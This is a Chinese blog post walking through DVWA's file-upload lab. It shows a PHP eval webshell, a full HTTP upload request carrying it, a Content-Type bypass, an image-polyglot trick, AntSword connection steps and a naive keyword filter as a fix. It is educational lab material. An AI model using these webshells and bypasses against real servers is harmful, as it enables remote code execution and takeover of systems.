[dvwa] file upload

已于 2024-04-10 00:04:08 修改
阅读量533 收藏 8
点赞数 3
文章标签: php 网络 网络安全 linux 运维 安全
于 2024-04-09 16:34:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63416413/article/details/137409949
版权

file upload

0x01 low

直接上传.php
内容写<?= eval($_POST['jj']);?>
用antsword连
在这里插入图片描述
路径跳两层
在这里插入图片描述

0x02 medium

添加了两种验证,格式为图片,大小限制小于1000
上传

POST /learndvwa/vulnerabilities/upload/ HTTP/1.1
Host: dvt.dv
Content-Length: 429
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://dvt.dv
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXl6wKhn7SrmUYYAo
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://dvt.dv/learndvwa/vulnerabilities/upload/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Cookie: security=medium; PHPSESSID=b94fij874mmc7v4cjgd6tci5c6
Connection: close

------WebKitFormBoundaryXl6wKhn7SrmUYYAo
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
------WebKitFormBoundaryXl6wKhn7SrmUYYAo
Content-Disposition: form-data; name="uploaded"; filename="mam.php"
Content-Type: application/octet-stream

<?= eval($_POST['jj']);?>
------WebKitFormBoundaryXl6wKhn7SrmUYYAo
Content-Disposition: form-data; name="Upload"

Upload
------WebKitFormBoundaryXl6wKhn7SrmUYYAo--

修改content-type为image/png
即可
在这里插入图片描述

0x03 high

getimagesize(string filename) 检查文件头
$uploaded_ext = substr( $uploaded_name, strrpos($uploaded_name, ‘.’) + 1);检查后缀

在windows中使用命令合成图片马
copy 1.jpg/b + 1.php/a 2.jpg
输入命令图片在前因为需要用到图片的文件头
在这里插入图片描述
成功上传,直接antsword连接要操作一下

因为蚁剑的原理是向上传文件发送包含参数的 post 请求,通过控制参数来执行不同的命令。这里服务器将木马文件解析成了图片文件,因此向其发送 post 请求时,服务器并不会执行相应命令。

想要连马,就要让它变成php的解析形式

用文件包含将马包含到页面
在这里插入图片描述
当前路径文件被解析,尝试用antsword连马

连接失败,考虑文件过大

原来是需要加cookie,就是让dvwa确认用户登陆状态
在这里插入图片描述
https://github.com/AntSwordProject/antSword/issues/107

0x04 Repair 修复漏洞

我们不希望文件中出现后门木马,过滤敏感关键字
包括马,方括号,大括号,eval,分号,php等

$file_content = file_get_contents($_FILES['uploaded_file']['tmp_name']);

$keywords = array("php", "eval", "post", "<", ">", "[", "]", "{", "}", ";");


foreach ($keywords as $keyword) {
    if (strpos($file_content, $keyword) !== false) {
        echo "上传的文件包含禁止的关键字。";
        // 删除上传的文件或者做其他处理
        break;
    }
}
Hugo_McQueen
关注
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWA Installation
08-15
由于DVWA包含一些需要写入权限的目录,如`upload`和`images`,请确保Web服务器用户对这些目录有写权限。 ### 7. 启动和访问 重启Web服务器和MySQL服务,然后在浏览器中访问`http://localhost/dvwa`,你应该能看到...
DVWA靶场搭建与使用
09-02
**DVWA靶场搭建与使用** DVWA(Damn Vulnerable Web Application)是一个开源的Web应用程序,专门为网络安全专业人员、开发人员和学生设计,用于学习和练习常见Web应用漏洞的识别和利用。它提供了多种安全漏洞的...
DVWA File Upload 文件上传漏洞
Lee_yc的博客
09-20 986
1、查看源代码,发现对上传的文件类型做了严格的过滤,只能上传图片,正常上传php文件会报错。2、利用文件包含漏洞,用图片包含一句或木马,将图片拖入edjpgcom这个软件。6、使用antsword连接,连接成功,getshell。5、访问文件,没有反应,也没有报错,说明木马上传成功。1、查看源码,发现对文件上传的类型没有任何限制。3、上传成功,访问一下没有报错说明小马已成功。4、使用antSword连一下,连接成功。6、用antSword连接,成功。5、访问上传文件,出现乱码。4、放包,发现上传成功。
DVWAFile Upload
过期的秋刀鱼
08-16 577
当用户在在文件上传的功能模块处上传文件时,如果WEB应用在文件上传过程中没有对文件的安全性进行有效的校验,攻击者可以通过上传WEBshell等恶意文件对服务器进行攻击,这种情况下认为系统存在文件上传漏洞,根据上传后文件存放位置不同,上传后对文件操作不用,可能会导致不一样的结构,包括完全控制系统,覆盖服务器文件等等。文件上传漏洞的利用分两步,第一需要能上传恶意文件,第二,恶意文件需要被触发,通过服务端自动运行触发或者攻击者配合其他漏洞手动触发。上传成功,给出了上传文件路径,使用蚁剑连接一句话木马。
DVWA File Upload
2201_75843485的博客
10-21 46
一开始点开找了很多文章看不懂页面还是这样,然后我根据上面的路径打开源码,将所有的require_once,改为include_once,保存后重启phpstudy就好了require():可以包含文件,如果包含错了,直接报错并退出程序的执行include():在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行require_once():与require类似,区别在于当重复调用同一文件时,程序只调用一次。
DVWA file Upload
qq_57894861的博客
09-06 104
将文件后缀改为jpg,然后开启代理,抓包抓下来,然后改为php再forward,成功上传,再配合蚁剑。只能用限定的后置以及文件头,所以简单的改后缀已经不能用了,但是可以把木马写到图片的16进制里。将url与连接密码输入进去,点击测试连接,成功点击添加,就得到系统控制权了。如果没有此文件先关闭火绒,然后找到对应文件夹重新下载一份。将其写入php文件上传,配合“中国蚁剑”就可以拿下系统。上传文件可使用一句话木马。然后上传成功,再配合蚁剑。中国蚁剑右击,添加数据。
DVWA file upload
m0_73606240的博客
01-10 137
DVWA file include
DVWA -File Upload-通关教程-完结
刘箫-技术库
04-07 1605
这行代码检查上传文件的类型和大小是否符合要求,并使用 getimagesize() 函数验证上传文件是否为有效的图像文件。但是此时是不能用蚁剑连接的,因为蚁剑的原理是向上传文件发送包含参数的 post 请求,通过控制参数来执行不同的命令。如果上传文件不是 JPEG 或 PNG 格式,或者文件大小超过 100KB,则输出错误消息,指示上传的文件不符合要求。这段 PHP 代码是一个简单的文件上传处理程序,它接受通过 POST 请求上传的文件,并将其保存到指定的目录中。如果收到了该请求,说明用户尝试上传文件。
DVWA File Upload 教程
哎呦喂的博客
04-07 1587
File Upload,即文件上传。文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 先看常规的文件上传操作: 客户端上传: <html> <head> <meta http-equiv="Content-Type" content=...
DVWA FILE UPLOAD(全等级)靶场笔记
weixin_39105969的博客
04-21 199
php中的basename函数用于返回上传文件的文件名部分 利用蚁剑 注意蚁剑的路径填写:URL(注意去除”#”)+文件路径 Low:直接上传 Medium:在未知代码的情况下,尝试修改木马的文件形式,重新上传 方法一:抓包修改type Burpsuite抓包,修改文件后缀绕过,上传之后蚁剑伺候 方法二:在php<5.3.4中,处理字符串的函数认为0x00是终止符。那么我们可以利用 00截断 漏洞来上传我们的一句话木马。网站上传函数处理hack.php%00.jpg时,首先后缀名是合法的jpg格式,可
dvwa File Upload
yuysjx的博客
02-09 57
文件上传
DVWAFile Upload(文件上传)
RexHa的博客
10-02 2701
文件上传原理: 黑客利用文件上传后服务器解析处理文件的漏洞上传一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。
DVWA靶场源码分享
12-11
DVWA(Damn Vulnerable Web Application)靶场是一个用于网络安全教育的开源Web应用程序。它由Chris Evans创建,旨在帮助安全专业人员、开发人员和学生通过实践来学习和理解常见Web应用程序安全漏洞。DVWA靶场提供了...
DVWA-master.7z 压缩包
09-14
DVWA(Damn Vulnerable Web Application)是一个开源的Web应用程序,设计用于帮助安全专业人员测试他们的安全技能和工具,同时也为开发人员提供一个平台来了解常见Web应用漏洞的本质。这个"DVWA-master.7z"压缩包...
DVWA-master.zip
01-04
DVWA:渗透测试与网络安全学习平台》 DVWA(Damn Vulnerable Web Application)是一个用于安全测试和教育目的的开源Web应用程序。它旨在帮助安全专业人员、开发人员和学生了解常见Web应用程序漏洞,并提供实践...
PHP商城案例
最新发布
王世凡的技术博客
07-26 190
http://www.e9933.com/
PHP小课堂】PHP中的数组函数学习(一)
硬核项目经理
07-22 844
PHP中的数组函数学习(一)数组操作可是 PHP 中的重头戏,重头到什么地步呢?别的语言可以说是面向对象、面向过程,PHP 则可以完全说是面向数组的一种语言。它的各种数据结构到最后都可以用数组来表示,这就是很恐怖的一件事。因为不管什么操作,我们都可以以数组的形式操作,这样的话,这些数组操作相关的函数就会显得异常的强大。当然,这也和语言的发展特性分不开。从最开始,PHP 就只是一个准备服务于个人的小...
BUUCTF [WUSTCTF2020]朴实无华
weixin_73399382的博客
07-22 514
第一块就是intval函数的绕过,逻辑上是不存在小于2020又大于2021的数,但是php低版本好像是7点多和以下该函数对不同类型的数据处理有偏差,第二处则是md5函数绕过,
MICA:面向复杂嵌入式系统的混合关键性部署框架
openEuler_的博客
07-23 1024
这种方式存在的问题是:硬件上需要两套系统、集成度不高,通信受限于片外物理机制的限制(如速度、时延等),软件上 Linux 和实时操作系统两者之间是割裂的,在灵活性上、可维护性上存在改进空间。在上述架构中,virtio-rpmsg 相当于网络协议中的 MAC 层,提供高效的底层通信机制,rpmsg 相当于网络协议中的传输层,提供了基于端点(endpoint)与通道(channel)抽象的通信机制,remoteproc 提供不同南向底座的生命周期管理功能,包括初始化、启动、暂停、结束等。MICA 的守护进程。
dvwa file inclusion和file upload
05-12
其中包括文件包含(File Inclusion)和文件上传(File Upload)两种漏洞。 文件包含漏洞是指Web应用程序未对用户输入的文件路径进行充分验证,导致攻击者能够构造恶意的文件路径来读取、执行或删除服务器上的敏感...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值